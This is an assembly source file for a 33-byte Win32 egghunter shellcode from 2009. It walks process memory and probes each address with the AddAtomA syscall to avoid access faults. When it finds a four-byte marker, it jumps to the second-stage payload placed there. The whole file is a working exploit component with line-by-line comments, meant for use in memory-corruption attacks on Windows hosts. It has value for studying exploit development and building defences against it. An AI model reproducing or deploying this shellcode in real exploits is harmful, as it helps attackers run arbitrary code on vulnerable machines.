; win32 eggsearch shellcode, 33 bytes

; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3

; (c) 2009 by Georg 'oxff' Wicherski

[bits 32]

marker equ 0x1f217767 ; 'gw!\x1f'

start:

xor edx, edx ; edx = 0, pointer to examined address

address_loop:

inc edx ; edx++, try next address

pagestart_check:

test dx, 0x0ffc ; are we within the first 4 bytes of a page?

jz address_loop ; if so, try next address as previous page might be unreadable

; and the cmp [edx-4], marker might result in a segmentation fault

access_check:

push edx ; save across syscall

push byte 8 ; eax = 8, syscall nr of AddAtomA

pop eax ; ^

int 0x2e ; fire syscall (eax = 8, edx = ptr)

cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy)

pop edx ;

je address_loop ; jmp if result was 0xc0000005

egg_check:

cmp dword [edx-4], marker ; is our egg right before examined address?

jne address_loop ; if not, try next address

egg_execute:

inc ebx ; make sure, zf is not set

jmp edx ; we found our egg at [edx-4], so we can jmp to edx